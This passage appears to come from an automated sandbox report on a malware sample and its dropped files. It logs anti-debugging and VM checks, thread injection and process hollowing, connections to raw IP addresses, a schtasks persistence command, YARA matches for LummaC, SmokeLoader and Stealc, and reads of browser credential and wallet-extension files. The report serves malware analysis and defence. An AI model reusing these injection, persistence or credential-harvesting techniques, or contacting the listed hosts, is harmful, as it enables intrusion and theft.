Source: explorer.exe, 00000002.00000000.2127636524.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.2128030306.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 00000002.00000000.2124075703.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: 81F7.exe, 0000000A.00000003.4064061015.00000000033EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
Source: explorer.exe, 00000002.00000000.2124075703.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2128030306.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

Process information queried: ProcessInformation

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Anti Debugging

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\81F7.exe

Code function: 9_2_004078DF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_004078DF

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

Code function: 0_2_0041B350 LoadLibraryW,GetProcAddress,VirtualProtect,

0_2_0041B350

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00AA0D90 mov eax, dword ptr fs:[00000030h]	0_2_00AA0D90
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00AA092B mov eax, dword ptr fs:[00000030h]	0_2_00AA092B
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00AD0538 push dword ptr fs:[00000030h]	0_2_00AD0538
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00840D90 mov eax, dword ptr fs:[00000030h]	6_2_00840D90
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_0084092B mov eax, dword ptr fs:[00000030h]	6_2_0084092B
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_0087FF90 push dword ptr fs:[00000030h]	6_2_0087FF90
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0228E0A3 push dword ptr fs:[00000030h]	9_2_0228E0A3
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_02450042 push dword ptr fs:[00000030h]	9_2_02450042

Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_004078DF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_004078DF
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_00405513 SetUnhandledExceptionFilter,	9_2_00405513
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0040D5B5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0040D5B5
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_004033D8 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_004033D8
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 10_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_006943E0
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 10_2_00694A78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00694A78
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1C948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_6D1C948B
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1CB144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_6D1CB144

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 8BAD.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 211.181.24.133 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 186.147.159.149 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.215.85.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: mx1.pub.mailpod8-cph3.one.com
Source: C:\Windows\explorer.exe	Network Connect: 185.172.128.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.252.102.119 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.221.35 80	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\81F7.exe

Code function: 9_2_02450110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

9_2_02450110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Thread created: C:\Windows\explorer.exe EIP: 2E01A88	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Thread created: unknown EIP: 31A1A88	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Thread created: unknown EIP: 87919F0

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Memory written: C:\Users\user\AppData\Local\Temp\81F7.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe	Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base address: 400000

Writes to foreign memory regions

Source: C:\Windows\System32\consent.exe

Memory written: C:\Windows\System32\svchost.exe base: CEE7CFE648

Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Process created: C:\Users\user\AppData\Local\Temp\81F7.exe C:\Users\user\AppData\Local\Temp\81F7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process created: unknown unknown
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

Source: explorer.exe, 00000002.00000000.2124338865.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000002.00000000.2125652366.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2124338865.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2124338865.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2124075703.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000002.00000000.2124338865.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2128030306.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe

Code function: 11_2_6D1C84B0 cpuid

11_2_6D1C84B0

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: PrepareTape,GetLocaleInfoW,	0_2_0041BC50
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: LocalUnlock,SetConsoleCP,ChangeTimerQueueTimer,CreateDirectoryA,lstrcatW,InterlockedDecrement,GetForegroundWindow,CreateDataAdviseHolder,DebugSetProcessKillOnExit,FlushFileBuffers,GetComputerNameA,GetConsoleAliasesLengthA,AddAtomA,GetCurrentDirectoryA,EnumDateFormatsW,FatalAppExitW,GetSystemDefaultLCID,TzSpecificLocalTimeToSystemTime,GetLocaleInfoW,	0_2_0041BDB0
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: PrepareTape,GetLocaleInfoW,	6_2_0041BC50
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: LocalUnlock,SetConsoleCP,ChangeTimerQueueTimer,CreateDirectoryA,lstrcatW,InterlockedDecrement,GetForegroundWindow,CreateDataAdviseHolder,DebugSetProcessKillOnExit,FlushFileBuffers,GetComputerNameA,GetConsoleAliasesLengthA,AddAtomA,GetCurrentDirectoryA,EnumDateFormatsW,FatalAppExitW,GetSystemDefaultLCID,TzSpecificLocalTimeToSystemTime,GetLocaleInfoW,	6_2_0041BDB0
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: GetConsoleAliasExesA,GetLocaleInfoA,GetConsoleAliasExesLengthW,GetConsoleAliasA,IsWindowEnabled,_ftell,__floor_pentium4,__floor_pentium4,GetTickCount,GetTickCount,SetLastError,GetTickCount,GetCurrentProcessId,GlobalFindAtomA,GetNumberFormatA,AssignProcessToJobObject,FindNextChangeNotification,	9_2_004014FA
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: GetDriveTypeW,GetLocaleInfoA,VerLanguageNameW,__vswprintf,GlobalAlloc,CharUpperBuffW,CharUpperBuffW,GetComputerNameA,HeapSize,LoadLibraryW,RemoveDirectoryA,CharUpperBuffW,InterlockedDecrement,GetVolumeInformationA,GetModuleHandleW,AddConsoleAliasW,SetComputerNameA,GetConsoleTitleW,MapUserPhysicalPages,SetLastError,QueryDosDeviceW,GetSystemPowerStatus,AreFileApisANSI,GetFileType,GetFileAttributesExA,CreateDirectoryExW,GetComputerNameW,	9_2_0040128A
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: GetLocaleInfoA,	9_2_0040E0E7

Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8BAD.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\AF26.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

Code function: 0_2_0041BD40 CreateNamedPipeA,FileTimeToLocalFileTime,

0_2_0041BD40

Source: C:\Users\user\AppData\Local\Temp\81F7.exe

Code function: 9_2_00405DAB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

9_2_00405DAB

Source: C:\Users\user\AppData\Local\Temp\81F7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: 98EC.exe, 98EC.exe, 0000000C.00000003.2715049663.000000000181D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\98EC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 21.2.288c47bbc1871b439df19ff4df68f076.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.288c47bbc1871b439df19ff4df68f076.exe.2e70e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.288c47bbc1871b439df19ff4df68f076.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000003.2546245866.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2690691611.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2682406576.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 28.2.C53F.exe.880e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.C53F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.C53F.exe.890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2615942734.0000000002371000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2552513633.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2456314399.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2615561764.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2140044524.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2140105329.0000000002481000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2457679800.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000020.00000002.2981994536.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
